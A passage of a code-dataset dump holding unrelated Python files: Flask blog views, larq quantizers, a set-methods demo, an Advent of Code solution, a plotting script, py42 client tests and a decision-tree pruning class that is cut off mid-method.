\n@cache.cached(timeout=3600, key_prefix='bar_data')\ndef data_required_cache():\n\n    # print('test +++ data_required_cache')\n    categorys = Category.query.all()\n    setting = BasicSetting.query.first()\n    tags = Tag.query.all()\n\n    return categorys,setting,tags\n\n\n@cache.memoize(3600)\ndef article_list_for_categoryType(categoryType):\n\n    category = Category.query.filter_by(name=categoryType).first()\n    if category is not None:\n        all_articles = Article.query.filter_by(category_id=category.id,at_restatus='1').order_by(-Article.at_creattime).all()\n    else:\n        all_articles = Article.query.filter_by(at_restatus='1').order_by(-Article.at_creattime).all()\n    \n    return all_articles\n\ndef make_cache_key(*args, **kwargs):\n    \"\"\"Build a cache key from the request path and query arguments.\"\"\"\n\n    path = request.path\n    args = str(hash(frozenset(request.args.items())))\n    return (path + args).encode('utf-8')\n\n\n\n# home page\n@home.route('/')\n@cache.cached(timeout=10)\ndef index():\n    # return redirect(url_for('home.navIndex',navitemtype='首页'))\n    return navIndex(navitemtype='首页')\n\n# all tags\n@home.route('/all-tags/')\n@cache.cached(timeout=3600)\ndef allTags():\n\n    categorys,setting,tags = data_required_cache()\n\n    return render_template('articalDetail_all_tags.html',categorys=categorys,tags=tags,setting=setting,currentItemId=\"首页\")\n\n# # article list\n# @home.route('/<navitemtype>/')\n# @home.route('/<navitemtype>/<tagname>/')\n# @home.route('/<navitemtype>/search/',methods=['POST'])\n# def article_list(navitemtype='首页',tagname=None):\n#     query = Article.query.filter_by(at_restatus='1')\n#     if tagname is not None:\n        \n\n\n\n@home.route('/articles_by_tag/<tagname>/')\n@cache.cached(timeout=3600, key_prefix=make_cache_key)\ndef articlesByTag(tagname):\n    tag = Tag.query.filter_by(tag_name=tagname).first()\n    if tag is 
None:\n        return navIndex(navitemtype='首页')\n    \n    page = request.args.get('page', 1, type=int)\n\n    articals = tag.article\n\n    categorys,setting,tags = data_required_cache()\n\n    return render_template('index.html',tag=tag,pagination=None,categorys=categorys,tags=tags,setting=setting,articals=articals,currentItemId=\"首页\")\n\n# article list for a category\n@home.route('/<navitemtype>/')\n@cache.cached(timeout=60, key_prefix=make_cache_key) \ndef navIndex(navitemtype):\n\n    page = request.args.get('page', 1, type=int)\n    if navitemtype == '首页':\n        pagination = Article.query.filter_by(at_restatus='1').order_by(-Article.at_creattime).paginate(page,per_page=8,error_out=True)\n    else:\n        # about page\n        # look up the category id by name first\n        category = Category.query.filter_by(name=navitemtype).first()\n        if category:\n            if navitemtype == '关于':\n                about_article = Article.query.filter_by(category_id=category.id).first()\n                # return redirect(url_for('home.detailById',navitemtype=navitemtype,articleID=about_article.at_id))\n                return detailById(navitemtype=navitemtype,articleID=about_article.at_id)\n            else:\n                pagination = Article.query.filter_by(category_id=category.id,at_restatus='1').order_by(-Article.at_creattime).paginate(page,per_page=8,error_out=True)\n        else:\n            # if the category does not exist, show everything\n            pagination = Article.query.filter_by(at_restatus='1').order_by(-Article.at_creattime).paginate(page,per_page=8,error_out=True)\n    \n    articals = pagination.items\n    \n    categorys,setting,tags = data_required_cache()\n\n    return render_template('index.html',pagination=pagination,categorys=categorys,tags=tags,setting=setting,articals=articals,currentItemId=navitemtype)\n\n# article detail by id\n@home.route('/<navitemtype>/articalDetail/<articleID>/')\n@readed_sum\n# @cache.cached(timeout=10, key_prefix=make_cache_key)\ndef detailById(navitemtype,articleID):\n\n    article = Article.query.filter_by(at_id=articleID).first()\n\n    categorys,setting,tags = data_required_cache()\n\n    all_articles = article_list_for_categoryType(navitemtype)\n    pre_at = None\n    after_at = None\n\n    for index in range(len(all_articles)):\n        if all_articles[index].at_id == article.at_id:\n            if index -1 >= 0:\n                pre_at = all_articles[index - 1]\n            if index + 1 < len(all_articles):\n                after_at = all_articles[index + 1]\n            break\n    \n    return render_template('articalDetail.html',article=article,categorys=categorys,tags=tags,setting=setting,currentItemId=navitemtype,pre_at=pre_at,after_at=after_at)\n\n# search\n@home.route('/search/',methods=['POST'])\ndef search():\n\n    page = request.args.get('page', 1, type=int)\n    search_from = SearchForm()\n    print(search_from.searchWords.data)\n    if search_from.validate_on_submit():\n        query = Article.query\n        query = query.join(arcicle_tags)\n        query = query.join(Tag).filter(or_(Article.at_title.like(\"%\"+search_from.searchWords.data+\"%\"),Article.at_body_summary.like(\"%\"+search_from.searchWords.data+\"%\"),Article.at_body_orgin.like(\"%\"+search_from.searchWords.data+\"%\"),Tag.tag_name.like(\"%\"+search_from.searchWords.data+\"%\")))\n        pagniation = query.paginate(page,per_page=8,error_out=True)\n    else:\n        return navIndex(navitemtype='首页')\n\n    articals = pagniation.items\n\n    categorys,setting,tags = data_required_cache()\n    \n    return render_template('index.html',search=search_from.searchWords.data,pagination=pagniation,categorys=categorys,tags=tags,setting=setting,articals=articals,currentItemId=\"首页\")\n\n","sub_path":".vscode/myBlogApp/views/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":6742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"52650622","text":"\"\"\"A 
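Editor's note: `make_cache_key` in the home.py record above folds the query string into the cache key so that, e.g., page 1 and page 2 of a category are cached separately. A standalone sketch of the same idea; note that `hash()` of a frozenset of strings is randomized per process in Python 3, so a digest-based key like the one below stays stable across restarts.

```python
import hashlib
from urllib.parse import urlencode

def make_cache_key(path, args):
    # Sort args so '?page=2&q=x' and '?q=x&page=2' share one cache entry.
    canonical = urlencode(sorted(args.items()))
    digest = hashlib.sha1(canonical.encode()).hexdigest()
    return f"{path}?{digest}"

print(make_cache_key("/articles_by_tag/python/", {"page": 2}))
```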
Quantizer defines the way of transforming a full precision input to a\nquantized output and the pseudo-gradient method used for the backwards pass.\n\nQuantizers can either be used through quantizer arguments that are supported\nfor Larq layers, such as `input_quantizer` and `kernel_quantizer`; or they\ncan be used similar to activations, i.e. either through an `Activation` layer,\nor through the `activation` argument supported by all forward layer:\n\n```python\nimport tensorflow as tf\nimport larq as lq\n...\nx = lq.layers.QuantDense(64, activation=None)(x)\nx = lq.layers.QuantDense(64, input_quantizer=\"ste_sign\")(x)\n```\n\nis equivalent to:\n\n```python\nx = lq.layers.QuantDense(64)(x)\nx = tf.keras.layers.Activation(\"ste_sign\")(x)\nx = lq.layers.QuantDense(64)(x)\n```\n\nas well as:\n\n```python\nx = lq.layers.QuantDense(64, activation=\"ste_sign\")(x)\nx = lq.layers.QuantDense(64)(x)\n```\n\nWe highly recommend using the first of these formulations: for the\nother two formulations, intermediate layers - like batch normalization or\naverage pooling - and shortcut connections may result in non-binary input\nto the convolutions.\n\"\"\"\n\nfrom dataclasses import dataclass\nimport tensorflow as tf\nfrom larq import utils, math\n\n\n@tf.custom_gradient\ndef _binarize_with_identity_grad(x):\n def grad(dy):\n return dy\n\n return math.sign(x), grad\n\n\n@tf.custom_gradient\ndef _binarize_with_weighted_grad(x):\n def grad(dy):\n return (1 - tf.abs(x)) * 2 * dy\n\n return math.sign(x), grad\n\n\n@utils.register_keras_custom_object\n@utils.set_precision(1)\ndef ste_sign(x):\n r\"\"\"\n Sign binarization function.\n \\\\[\n q(x) = \\begin{cases}\n -1 & x < 0 \\\\\\\n 1 & x \\geq 0\n \\end{cases}\n \\\\]\n\n The gradient is estimated using the Straight-Through Estimator\n (essentially the binarization is replaced by a clipped identity on the\n backward pass).\n \\\\[\\frac{\\partial q(x)}{\\partial x} = \\begin{cases}\n 1 & \\left|x\\right| \\leq 1 \\\\\\\n 0 & \\left|x\\right| > 1\n \\end{cases}\\\\]\n\n ```plot-activation\n quantizers.ste_sign\n ```\n\n # Arguments\n x: Input tensor.\n\n # Returns\n Binarized tensor.\n\n # References\n - [Binarized Neural Networks: Training Deep Neural Networks with Weights and\n Activations Constrained to +1 or -1](http://arxiv.org/abs/1602.02830)\n \"\"\"\n\n x = tf.clip_by_value(x, -1, 1)\n\n return _binarize_with_identity_grad(x)\n\n\n@utils.register_keras_custom_object\n@utils.set_precision(1)\ndef magnitude_aware_sign(x):\n r\"\"\"\n Magnitude-aware sign for Bi-Real Net.\n\n ```plot-activation\n quantizers.magnitude_aware_sign\n ```\n\n # Arguments\n x: Input tensor\n\n # Returns\n Scaled binarized tensor (with values in $\\{-a, a\\}$, where $a$ is a float).\n\n # References\n - [Bi-Real Net: Enhancing the Performance of 1-bit CNNs With Improved\n Representational Capability and Advanced Training\n Algorithm](https://arxiv.org/abs/1808.00278)\n\n \"\"\"\n scale_factor = tf.reduce_mean(tf.abs(x), axis=list(range(len(x.shape) - 1)))\n\n return tf.stop_gradient(scale_factor) * ste_sign(x)\n\n\n@utils.register_keras_custom_object\n@utils.set_precision(1)\ndef approx_sign(x):\n r\"\"\"\n Sign binarization function.\n \\\\[\n q(x) = \\begin{cases}\n -1 & x < 0 \\\\\\\n 1 & x \\geq 0\n \\end{cases}\n \\\\]\n\n The gradient is estimated using the ApproxSign method.\n \\\\[\\frac{\\partial q(x)}{\\partial x} = \\begin{cases}\n (2 - 2 \\left|x\\right|) & \\left|x\\right| \\leq 1 \\\\\\\n 0 & \\left|x\\right| > 1\n \\end{cases}\n \\\\]\n\n ```plot-activation\n 
quantizers.approx_sign\n ```\n\n # Arguments\n x: Input tensor.\n\n # Returns\n Binarized tensor.\n\n # References\n - [Bi-Real Net: Enhancing the Performance of 1-bit CNNs With Improved\n Representational Capability and Advanced\n Training Algorithm](http://arxiv.org/abs/1808.00278)\n \"\"\"\n\n x = tf.clip_by_value(x, -1, 1)\n\n return _binarize_with_weighted_grad(x)\n\n\n@utils.register_keras_custom_object\n@utils.set_precision(2)\n@dataclass\nclass SteTern:\n r\"\"\"Instantiates a ternarization quantizer.\n\n \\\\[\n q(x) = \\begin{cases}\n +1 & x > \\Delta \\\\\\\n 0 & |x| < \\Delta \\\\\\\n -1 & x < - \\Delta\n \\end{cases}\n \\\\]\n\n where $\\Delta$ is defined as the threshold and can be passed as an argument,\n or can be calculated as per the Ternary Weight Networks original paper, such that\n\n \\\\[\n \\Delta = \\frac{0.7}{n} \\sum_{i=1}^{n} |W_i|\n \\\\]\n where we assume that $W_i$ is generated from a normal distribution.\n\n The gradient is estimated using the Straight-Through Estimator\n (essentially the Ternarization is replaced by a clipped identity on the\n backward pass).\n \\\\[\\frac{\\partial q(x)}{\\partial x} = \\begin{cases}\n 1 & \\left|x\\right| \\leq 1 \\\\\\\n 0 & \\left|x\\right| > 1\n \\end{cases}\\\\]\n\n ```plot-activation\n quantizers.SteTern\n ```\n\n # Arguments\n threshold_value: The value for the threshold, $\\Delta$.\n ternary_weight_networks: Boolean of whether to use the Ternary Weight Networks threshold calculation.\n\n # Returns\n Ternarization function\n\n # Aliases\n - `larq.quantizers.ste_tern`\n\n # References\n - [Ternary Weight Networks](http://arxiv.org/abs/1605.04711)\n \"\"\"\n\n threshold_value: float = 0.05\n ternary_weight_networks: bool = False\n\n def __call__(self, x):\n \"\"\"Calls ternarization function.\n\n # Arguments\n x: Input tensor.\n\n # Returns\n Ternarized tensor.\n \"\"\"\n x = tf.clip_by_value(x, -1, 1)\n if self.ternary_weight_networks:\n threshold = self.threshold_twn(x)\n else:\n threshold = self.threshold_value\n\n @tf.custom_gradient\n def _ternarize_with_identity_grad(x):\n def grad(dy):\n return dy\n\n return (tf.sign(tf.sign(x + threshold) + tf.sign(x - threshold)), grad)\n\n return _ternarize_with_identity_grad(x)\n\n def threshold_twn(self, x):\n return 0.7 * tf.reduce_sum(tf.abs(x)) / tf.cast(tf.size(x), x.dtype)\n\n def get_config(self):\n return {\n \"threshold_value\": self.threshold_value,\n \"ternary_weight_networks\": self.ternary_weight_networks,\n }\n\n\nste_tern = SteTern\n\n\ndef serialize(initializer):\n return tf.keras.utils.serialize_keras_object(initializer)\n\n\ndef deserialize(name, custom_objects=None):\n return tf.keras.utils.deserialize_keras_object(\n name,\n module_objects=globals(),\n custom_objects=custom_objects,\n printable_module_name=\"quantization function\",\n )\n\n\ndef get(identifier):\n if identifier is None:\n return None\n if isinstance(identifier, str):\n return deserialize(str(identifier))\n if callable(identifier):\n return identifier\n raise ValueError(\n f\"Could not interpret quantization function identifier: {identifier}\"\n )\n","sub_path":"larq/quantizers.py","file_name":"quantizers.py","file_ext":"py","file_size_in_byte":6895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"460551883","text":"# Set methods\n\n# add , inserts an item into the set\n\n\ns = {1, 2, 3, 3}\nf = s\n\ns.add(8)\n\nprint(s)\n\n# Remove , deletes an item from a set\n\ns.remove(8)\nprint(s)\n\n# copy creates a copy of the set which in not 
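Editor's note: a quick check, in the spirit of the quantizers record above, that the straight-through estimator really behaves like a clipped identity: the gradient is one inside the clipping range and zero outside it. It uses the same `tf.custom_gradient` mechanism; the inputs avoid zero because `tf.sign(0)` is 0 whereas larq's `math.sign` maps zero to +1.

```python
import tensorflow as tf

@tf.custom_gradient
def ste_sign(x):
    # Forward: hard sign. Backward: identity (the straight-through estimator).
    def grad(dy):
        return dy
    return tf.sign(x), grad

x = tf.Variable([-2.0, -0.5, 0.5, 2.0])
with tf.GradientTape() as tape:
    y = ste_sign(tf.clip_by_value(x, -1.0, 1.0))

print(y.numpy())                    # [-1. -1.  1.  1.]
print(tape.gradient(y, x).numpy())  # [0. 1. 1. 0.] -- the clipped identity
```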
identical in memory to the first\n\ns2 = s.copy()\n\ns2 is s # returns false\n\n# Can also check the memory address of a variable\npointer_s = hex(id(s)) # same\npointer_f = hex(id(f)) # same\npointer_s2 = hex(id(s2)) # different bc of method copy\n\nprint(pointer_f, pointer_s, pointer_s2)\n\n# Clear deletes all the items in the set\n\n# s2.clear()\n","sub_path":"cs_python_lec/data_structures/sets/set_02.py","file_name":"set_02.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"308251856","text":"# Day 3: No Matter How you Slice It\n\nfrom utils import *\n\n\ndef find_overlap():\n points = set()\n collisions = set()\n lines = list(map(ints, get_input_lines()))\n\n for p in lines:\n for x in range(p[1], p[1] + p[3]):\n for y in range(p[2], p[2] + p[4]):\n if (x, y) not in points:\n points.add((x, y))\n else:\n collisions.add((x, y))\n\n print('There are %d collisions' % len(collisions))\n\n for p in lines:\n collides = False\n for x in range(p[1], p[1] + p[3]):\n for y in range(p[2], p[2] + p[4]):\n if (x, y) in collisions:\n collides = True\n\n if not collides:\n print('Claim %d does not collide!' % p[0])\n\n\nif __name__ == '__main__':\n find_overlap()\n","sub_path":"day03/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"187795090","text":"import matplotlib.pyplot as plt\nimport ast\nfrom scipy.ndimage.filters import gaussian_filter1d\nimport numpy as np\n\ndef parse_propagation(name):\n with open(name) as fp:\n data = [ast.literal_eval(line) for line in fp if line.strip()]\n iterations = range(len(data[0]))\n print(\"Number of iterations {}\".format(len(iterations)))\n return [iterations, data[0], data[1], data[2]]\n\ndef parse_differential(name, i_ms):\n with open(name) as fp:\n data = [ast.literal_eval(line) for line in fp if line.strip()]\n d = data[0]\n d = d[:len(i_ms)]\n d = [x / 1000 for x in d]\n return d\n\niterations, capturing_time, updates, propagation_time = parse_propagation(\"bottleneck_issue_stats.txt\")\ndifferential_time = parse_differential(\"diff_bot.txt\", iterations)\n\npropagation_time = [u / 1000 for u in propagation_time]\n\nprint()\n\ndef avg(l):\n return sum(l) / len(l)\n\nplt.rcParams.update({'font.size': 15})\n\nfig, ax1 = plt.subplots()\n\ns = 1\nfirst_graph = np.array(propagation_time)\n#first_graph = gaussian_filter1d(first_graph, sigma=s)\nsecond_graph = np.array(differential_time)\n#second_graph = gaussian_filter1d(second_graph, sigma=s)\n\ncolor = 'tab:blue'\nax1.set_xlabel('number of batch captures,\\nbenchmarking run for 30 s')\nax1.set_ylabel('batch propagation time (microseconds) $10^3$')\nax1.plot(range(len(first_graph)), first_graph, color=color)\nax1.tick_params(axis='y', labelcolor=color)\n\n#ax1.set_ylim([0, 300])\nax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\ncolor = 'tab:orange'\nax2.set_ylabel('algorithm recomp. 
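Editor's note: the nested set bookkeeping in `find_overlap` (day3.py above) can be flattened with `collections.Counter`: count every covered square, then collisions are the squares seen at least twice. The claims below are made-up samples in the puzzle's (id, left, top, width, height) form.

```python
from collections import Counter

claims = [(1, 1, 3, 4, 4), (2, 3, 1, 4, 4), (3, 5, 5, 2, 2)]  # sample data

fabric = Counter(
    (x, y)
    for _, left, top, w, h in claims
    for x in range(left, left + w)
    for y in range(top, top + h)
)

print(sum(v > 1 for v in fabric.values()))  # squares claimed more than once

for cid, left, top, w, h in claims:
    if all(fabric[(x, y)] == 1
           for x in range(left, left + w)
           for y in range(top, top + h)):
        print(f"Claim {cid} does not collide")
```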
time (ms)') # we already handled the x-label with ax1\nax2.plot(range(len(second_graph)), second_graph, color=color)\nax2.tick_params(axis='y', labelcolor=color)\n\nfig.tight_layout() # otherwise the right y-label is slightly clipped\n\nplt.subplots_adjust(top=0.80)\nplt.subplots_adjust(bottom=0.20)\nplt.subplots_adjust(left=0.10)\nplt.subplots_adjust(right=0.90)\n\n#axes = plt.gca()\n#plt.ylim([0, 300])\n\nplt.title(\"Computing Connected Components,\\nat a rate of 7000 transasctions per second,\\nusing 1 differential worker\")\n\nfig = plt.gcf()\nfig.set_size_inches(9, 5)\nplt.savefig(\"propagation_differential_bottleneck_issue_smoothed_better\")\nplt.show()\n\n\n\n","sub_path":"vizualizing/bottleneck_workers_example_new/vizualize.py","file_name":"vizualize.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"65880649","text":"# -*- coding: utf-8 -*-\nimport pytest\nfrom requests import Response\n\nimport py42\nfrom py42.clients.devices import DeviceClient\nfrom py42.response import Py42Response\n\nCOMPUTER_URI = \"/api/Computer\"\n\nDEFAULT_GET_DEVICES_PARAMS = {\n \"active\": None,\n \"blocked\": None,\n \"orgUid\": None,\n \"userUid\": None,\n \"targetComputerGuid\": None,\n \"incBackupUsage\": None,\n \"incCounts\": True,\n \"pgNum\": 1,\n \"pgSize\": 500,\n \"q\": None,\n}\n\nMOCK_GET_DEVICE_RESPONSE = \"\"\"{\"totalCount\": 3000, \"computers\":[\"foo\"]}\"\"\"\n\nMOCK_EMPTY_GET_DEVICE_RESPONSE = \"\"\"{\"totalCount\": 3000, \"computers\":[]}\"\"\"\n\n\nclass TestDeviceClient(object):\n @pytest.fixture\n def mock_get_all_response(self, mocker):\n response = mocker.MagicMock(spec=Response)\n response.status_code = 200\n response.encoding = \"utf-8\"\n response.text = MOCK_GET_DEVICE_RESPONSE\n return Py42Response(response)\n\n @pytest.fixture\n def mock_get_all_empty_response(self, mocker, py42_response):\n response = mocker.MagicMock(spec=Response)\n response.status_code = 200\n response.encoding = \"utf-8\"\n response.text = MOCK_EMPTY_GET_DEVICE_RESPONSE\n return Py42Response(response)\n\n def test_get_all_calls_get_with_uri_and_params(\n self, mock_session, mock_get_all_response\n ):\n client = DeviceClient(mock_session)\n mock_session.get.return_value = mock_get_all_response\n for _ in client.get_all(q=\"TEST-HOSTNAME\"):\n break\n expected_params = DEFAULT_GET_DEVICES_PARAMS\n expected_params[\"q\"] = \"TEST-HOSTNAME\"\n first_call = mock_session.get.call_args_list[0]\n assert first_call[0][0] == COMPUTER_URI\n assert first_call[1][\"params\"] == DEFAULT_GET_DEVICES_PARAMS\n\n def test_unicode_hostname_get_devices_calls_get_with_unicode_q_param(\n self, mock_session, mock_get_all_response\n ):\n unicode_hostname = u\"您已经发现了秘密信息\"\n client = DeviceClient(mock_session)\n mock_session.get.return_value = mock_get_all_response\n for _ in client.get_all(q=unicode_hostname):\n break\n first_call = mock_session.get.call_args_list[0]\n assert first_call[0][0] == COMPUTER_URI\n params = DEFAULT_GET_DEVICES_PARAMS\n params[\"q\"] = unicode_hostname\n assert first_call[1][\"params\"] == params\n\n def test_get_by_id_calls_get_with_uri_and_params(\n self, mock_session, successful_response\n ):\n mock_session.get.return_value = successful_response\n client = DeviceClient(mock_session)\n client.get_by_id(\"DEVICE_ID\", include_backup_usage=True)\n expected_params = {\"incBackupUsage\": True}\n uri = \"{}/{}\".format(COMPUTER_URI, \"DEVICE_ID\")\n mock_session.get.assert_called_once_with(uri, 
params=expected_params)\n\n def test_get_all_calls_get_expected_number_of_times(\n self, mock_session, mock_get_all_response, mock_get_all_empty_response\n ):\n py42.settings.items_per_page = 1\n client = DeviceClient(mock_session)\n mock_session.get.side_effect = [\n mock_get_all_response,\n mock_get_all_response,\n mock_get_all_empty_response,\n ]\n for _ in client.get_all():\n pass\n py42.settings.items_per_page = 500\n assert mock_session.get.call_count == 3\n\n def test_get_page_calls_get_with_expected_url_and_params(self, mock_session):\n client = DeviceClient(mock_session)\n client.get_page(20, True, True, \"org\", \"user\", \"dest\", True, True, 1000)\n mock_session.get.assert_called_once_with(\n \"/api/Computer\",\n params={\n \"active\": True,\n \"blocked\": True,\n \"orgUid\": \"org\",\n \"userUid\": \"user\",\n \"targetComputerGuid\": \"dest\",\n \"incBackupUsage\": True,\n \"incCounts\": True,\n \"pgNum\": 20,\n \"pgSize\": 1000,\n \"q\": None,\n },\n )\n\n def test_get_agent_state_calls_get_with_uri_and_params(\n self, mock_session, successful_response\n ):\n mock_session.get.return_value = successful_response\n client = DeviceClient(mock_session)\n client.get_agent_state(\"DEVICE_ID\", property_name=\"KEY\")\n expected_params = {\"deviceGuid\": \"DEVICE_ID\", \"propertyName\": \"KEY\"}\n uri = u\"/api/v14/agent-state/view-by-device-guid\"\n mock_session.get.assert_called_once_with(uri, params=expected_params)\n\n def test_get_agent_full_disk_access_state_calls_get_agent_state_with_arguments(\n self, mock_session, successful_response, mocker\n ):\n mock_session.get.return_value = successful_response\n client = DeviceClient(mock_session)\n client.get_agent_state = mocker.Mock()\n client.get_agent_full_disk_access_state(\"DEVICE_ID\")\n client.get_agent_state.assert_called_once_with(\"DEVICE_ID\", \"fullDiskAccess\")\n","sub_path":"tests/clients/test_devices.py","file_name":"test_devices.py","file_ext":"py","file_size_in_byte":4992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"183743447","text":"import pandas as pd\nimport numpy as np\nfrom graphviz import Graph\nfrom copy import deepcopy\nfrom sklearn.model_selection import KFold\n\n\nclass DecisionTree:\n def __init__(self, parent=None):\n self._parent = parent\n self._left_child = None\n self._right_child = None\n self._value = None\n self._min_leaf = None\n self._split_var = None\n self._split_value = None\n self._node_loss = None\n self._branch_loss = None\n self._is_fitted = False\n self._feature_names = None\n self._num_features = None\n self._y = None\n\n def __str__(self):\n if self._is_fitted is False:\n string_dict = {\"Loss\": self.branch_loss, \"Estimate\": self.value}\n elif self._feature_names is not None:\n string_dict = {\n \"Loss\": self.branch_loss,\n \"Splitting Variable (First split)\": self._feature_names[\n self._split_var\n ],\n \"Splitting Value\": self._split_value,\n \"Tree Depth\": self.depth,\n \"Estimate\": self.value,\n }\n else:\n string_dict = {\n \"Loss\": self.branch_loss,\n \"Splitting Feature (First split)\": self._split_var,\n \"Splitting Value\": self._split_value,\n \"Tree Depth\": self.depth,\n \"Estimate\": self.value,\n }\n return dict.__str__(string_dict)\n\n # Property and Setter Functions\n\n @property\n def y(self):\n return self._y\n\n @property\n def parent(self):\n return self._parent\n\n @property\n def left_child(self):\n return self._left_child\n\n @property\n def right_child(self):\n return self._right_child\n\n 
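# These setters exist so the pruning helpers further down\n    # (get_first_subtree, get_pruned_tree_and_alpha_sequence) can detach a\n    # branch in place by assigning None to both children.\n    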
@right_child.setter\n def right_child(self, node):\n self._right_child = node\n\n @left_child.setter\n def left_child(self, node):\n self._left_child = node\n\n @property\n def feature_names(self):\n return self._feature_names\n\n @feature_names.setter\n def feature_names(self, value):\n if self.feature_names is None:\n self._feature_names = value\n\n @property\n def depth(self):\n return DecisionTree.detect_tree_depth(self)\n\n @property\n def is_leaf(self):\n if self._is_fitted:\n return self._left_child is None\n else:\n print(\n \"The tree has not been fitted yet, hence it is root and leaf at the \"\n \"same time.\\n\"\n )\n return True\n\n @property\n def is_root(self):\n return self._parent is None\n\n @property\n def is_fitted(self):\n return self._is_fitted\n\n @property\n def number_of_leafs(self):\n return DecisionTree.get_number_of_leafs(self)\n\n @property\n def value(self):\n return self._value\n\n @property\n def node_loss(self):\n return self._node_loss\n\n @property\n def branch_loss(self):\n self.update_branch_loss()\n return self._branch_loss\n\n # Various Auxiliary Functions\n\n def update_branch_loss(self):\n leaf_list = DecisionTree.get_leafs_in_list(self)\n loss_array = np.array([leaf.node_loss for leaf in leaf_list])\n self._branch_loss = np.sum(loss_array)\n\n def output_partition_estimates(self):\n leaf_list = DecisionTree.get_leafs_in_list(self)\n for i, leaf in enumerate(leaf_list):\n print(\"Leaf {:d}; Estimate: {:3.03f}\".format(i, leaf.value))\n\n def splitting_info_to_string(self):\n if self.left_child is None:\n return \"\"\n else:\n if self._feature_names is None:\n return \"Variable %d <= %3.3f\" % (self._split_var, self._split_value)\n else:\n return \"%s <= %3.3f\" % (\n self._feature_names[self._split_var],\n self._split_value,\n )\n\n # Static Methods (Some of which should probably not be static methods)\n\n @staticmethod\n def get_leafs_in_list(tree):\n leaf_list = []\n if tree.left_child is None:\n leaf_list.append(tree)\n else:\n leaf_list.extend(DecisionTree.get_leafs_in_list(tree.left_child))\n leaf_list.extend(DecisionTree.get_leafs_in_list(tree.right_child))\n return leaf_list\n\n @staticmethod\n def get_number_of_leafs(tree):\n return len(DecisionTree.get_leafs_in_list(tree))\n\n @staticmethod\n def get_level_in_list(tree, level):\n # level: 0 -> root, 1 -> first layer, 2 -> ...\n level_list = []\n if level == 0:\n level_list.append(tree)\n else:\n if tree.left_child is not None:\n level_list.extend(\n DecisionTree.get_level_in_list(tree.left_child, level - 1)\n )\n level_list.extend(\n DecisionTree.get_level_in_list(tree.right_child, level - 1)\n )\n return level_list\n\n @staticmethod\n def detect_tree_depth(tree):\n depth_left, depth_right = 0, 0\n if tree.left_child is not None:\n depth_left += 1 + DecisionTree.detect_tree_depth(tree.left_child)\n depth_right += 1 + DecisionTree.detect_tree_depth(tree.right_child)\n return max(depth_left, depth_right)\n\n @staticmethod\n def validate(tree, X_test, y_test, metric=None):\n # returns assumed validation metric on predicted and true outcomes\n if metric is None:\n\n def metric(pred, true):\n return np.mean(\n (pred - true) ** 2\n ) # if no metric is given Mean Squared Error is used (MSE)\n\n y_pred = tree.predict(X_test)\n return np.mean(metric(y_pred, y_test))\n\n @staticmethod\n def get_first_subtree(fitted_tree, thresh=None):\n subtree = deepcopy(fitted_tree)\n if thresh is None:\n thresh = np.sqrt(np.var(subtree.y)) / 50\n depth = subtree.depth\n if depth < 1:\n return subtree\n for i in 
range(depth):\n for parent_node in DecisionTree.get_level_in_list(subtree, depth - i - 1):\n if parent_node.left_child is not None:\n if (\n parent_node.node_loss\n <= parent_node.left_child.node_loss\n + parent_node.right_child.node_loss\n + thresh\n ):\n parent_node.left_child, parent_node.right_child = None, None\n return subtree\n\n @staticmethod\n def get_pruned_tree_and_alpha_sequence(fitted_tree, thresh):\n assert isinstance(\n fitted_tree, DecisionTree\n ), \"This method only works on Decision Trees\"\n if not fitted_tree.is_fitted:\n raise ValueError(\"This method only works on fitted trees\")\n\n alphas = [0]\n subtrees = [\n DecisionTree.get_first_subtree(fitted_tree, thresh)\n ] # get_first_subtree() does deepcopy\n\n index = 0\n while subtrees[index].left_child is not None:\n tmp_argmin, tmp_min = g(subtrees[index])\n tmp_subtree = deepcopy(subtrees[index])\n alphas.append(tmp_min)\n for node in tmp_argmin:\n node.left_child = None\n node.right_child = None\n subtrees.insert(index, tmp_subtree)\n index += 1\n\n if not test_monotonicity_list(alphas) and not test_monotonicity_list(\n alphas, strictly=False\n ):\n raise RuntimeError(\"Sequence of alphas is not increasing\")\n if not test_monotonicity_list(alphas):\n print(\"Sequence of alphas is only weakly increasing.\")\n return {\n \"alphas\": alphas,\n \"subtrees\": subtrees,\n } # i think i want: return alphas, subtrees\n\n @staticmethod\n def get_subtree_crspnd_to_abtry_alpha(tree, alpha, thresh):\n sequences = DecisionTree.get_pruned_tree_and_alpha_sequence(tree, thresh)\n alphas = sequences[\"alphas\"]\n subtrees = sequences[\"subtrees\"]\n alphas = np.array(alphas)\n if alpha >= alphas[-1]:\n return subtrees[-1]\n else:\n index = np.where(alphas > alpha)[0][0]\n return subtrees[index]\n\n @staticmethod\n def apply_kFold_CV(X_learn, y_learn, k=5, thresh=0, fitted_tree=None):\n try:\n feature_names = X_learn.columns.values\n except AttributeError:\n feature_names = None\n\n if fitted_tree is None:\n fitted_tree = DecisionTree()\n fitted_tree.fit(X_learn, y_learn)\n assert len(y_learn) == len(X_learn), (\n \"Argument <> and <> must have the same number \"\n \"of observations.\"\n )\n X_learn = coerce_to_ndarray(X_learn)\n y_learn = coerce_to_ndarray(y_learn)\n\n kf = KFold(k)\n tree_max = fitted_tree # complete maximal tree\n tree_max_sequences = DecisionTree.get_pruned_tree_and_alpha_sequence(\n tree_max, thresh\n )\n tree_k_max_list = [] # list of maximal trees in each cross validation sample\n tree_k_subtree_dict = []\n test_X = []\n test_y = []\n\n for train_index, test_index in kf.split(X_learn, y_learn):\n tmp_tree = DecisionTree()\n tmp_tree.fit(X_learn[train_index], y_learn[train_index])\n tree_k_max_list.append(tmp_tree)\n test_X.append(X_learn[test_index])\n test_y.append(y_learn[test_index])\n\n for tree in tree_k_max_list:\n tree_k_subtree_dict.append(\n DecisionTree.get_pruned_tree_and_alpha_sequence(tree, thresh)\n )\n\n alphas = tree_max_sequences[\"alphas\"]\n 